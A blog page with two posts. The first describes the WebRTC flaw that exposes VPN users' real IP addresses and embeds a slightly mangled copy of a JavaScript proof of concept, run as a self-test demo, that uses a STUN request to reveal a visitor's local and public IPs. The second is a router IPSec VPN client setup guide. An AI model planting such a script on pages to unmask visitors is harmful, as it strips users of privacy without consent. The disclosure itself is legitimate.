Hackviking He killed Chuck Norris, he ruled dancing so he took up a new hobby…

6Feb/151

WebRTC vulnerability exposes VPN users

It's now easy to expose the true IP address of VPN users. Daniel Roesler published the an example howto exploit the bug on Github. Firefoz, Mozilla, Chroma and Internet Explorer (with WebRTC plugin) are vulnerable to this bug. WebRtc is used for peer-to-peer connections for video chat and other similar implementations.

If the user isn't using VPN the computers internal network address will be exposed. This implementation is used for the WebRtc to handle NAT on the network and be able to bind sessions to the public IP. However the bug is really nasty because it exposes these functions to javascript. So this entire implementation below is made with javascript. The request is not registered in the developer console and can not be blocked by plugins.

If the user is using a lightweight VPN client, like a chrome plugin, the VPN will be bypassed all together and both the real public IP and internal NAT address will be shown.

Below there is a demo, if you see your public and private IP your browser is vulnerable for this exploit.

Code cred: Daniel Roesler (I only modified it to run in WordPress).

Your local IP addresses:

    Your public IP addresses:

      <script>
      function getIPs(){
          var ip_dups = {};
          //compatibility for firefox and chrome
          var RTCPeerConnection = window.RTCPeerConnection
          || window.mozRTCPeerConnection
          || window.webkitRTCPeerConnection;
          var mediaConstraints = {
              optional: [{RtpDataChannels: true}]
          };
          //firefox already has a default stun server in about:config
          // media.peerconnection.default_iceservers =
          // [{"url": "stun:stun.services.mozilla.com"}]
          var servers = undefined;
          //add same stun server for chrome
          if(window.webkitRTCPeerConnection)
              servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
              //construct a new RTCPeerConnection
              var pc = new RTCPeerConnection(servers, mediaConstraints);
              //listen for candidate events
              pc.onicecandidate = function(ice){
              //skip non-candidate events
              if(ice.candidate){
                  //match just the IP address
                  var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
                  var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
                  //remove duplicates
                  if(ip_dups[ip_addr] === undefined)
                      var li = document.createElement("li");
                      li.textContent = ip_addr;
                      //local IPs
                      if (ip_addr.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/))
                          document.getElementById("localip").appendChild(li);
                      //assume the rest are public IPs
                      else
                          document.getElementById("publicip").appendChild(li);
                          ip_dups[ip_addr] = true;
              }
          };
          //create a bogus data channel
          pc.createDataChannel("");
          //create an offer sdp
          pc.createOffer(function(result){
              //trigger the stun server request
              pc.setLocalDescription(result, function(){}, function(){});
          });
      }
      

      1Oct/1038

      IPSec VPN with Netgear FVS318v3

      My Belkin N1 Vision router decided to die the other day. So i realized it was time for an industrial strength router. Checked out a really nice one with Linux built in and great application support. It was a little prize for me right now, just got a new girlfriend and moved in with her.... 🙂

      I finally decided for the Netgear FVS318v3 which comes with a built in IPSec VPN server for 8 concurrent connections. Netgear wants ~$50 for the client software which I wasn't really happy about paying. So I started checking around for a free alternative. Finally I came across Shrew Soft VPN Client (http://www.shrew.net/). It's free and really light weight. It took some figuring out how to configure it all so I thought it was a good idea to share it.

      I presume that you already have DynDNS enabled. If you have a dynamic WAN address it's a must to get this to work.

      First you have to set up your FVS318 router to accept the connections.

      1. Log on to your router and go to the "VPN Wizard" in the left hand menu.
      2. Just click "Next"...
      3. You have to set a name for your connection and a pre-shared key (PSK). Select "A remote VPN client" as connection type.
      4. You will get a confirmation screen next. Just click "Done".

      Now your router is up to speed and you need to download the VPN client from http://www.shrew.net/download
      Ones installed it's time to set up your new connection.

      1. In the router admin page select "IKE Policies" in the left hand menu. The two pieces of information you are interested in is "Local ID" and "Remote ID".
      2. Now start Shrew Soft VPN Access Manager and click "Add".
      3. Now enter your DynDNS, or static WAN address if you have one, in the "Host Name or IP Address" field.
      4. Set "Auto Configuration" to "disabled".
      5. Set "Local Host" - "Address Method" to "Use an existing adapter and current address".
      6. Now go to the "Name Resolution" tab. If you know the addresses to wins server and/or dns server on the remote network enter them here. If not uncheck the check boxes.
      7. Now go to the "Authentication" tab and set "Authentication Method" to "Mutual PSK".
      8. "Local Identity" should be the field "Remote ID" on the routers "IKE Policies" page. "Identification Type" should be "Fully Qualified Domain Name".
      9. On the "Remote Identity" tab the "Identification Type" should be "Fully Qualified Domain Name" and "FQDN String" should be the "Local ID" from the routers "IKE Policies" page.
      10. Moving on to the "Credentials" tab fill in your PSK in the "Pre Shared Key" field. In this case "areallylamekey".
      11. Then you go to main tab "Policy".
      12. Uncheck the "Obtain Topology Automatically or Tunnel All" check box.
      13. Click the "Add" button.
      14. Type in your network. To route all the 192.168.0.x addresses over the VPN tunnel enter address 192.168.0.0 and netmask 255.255.255.0. If you have the same network address range at home and in your current location you can enter specific addresses or add an other topology entry that excludes those addresses.
      15. Then hit "Save" and you will return to the mane window.
      16. Dubbel click your connection and select "Connect". That's it!

      Your now up and running with your own secure IPSec tunnel to your home or office!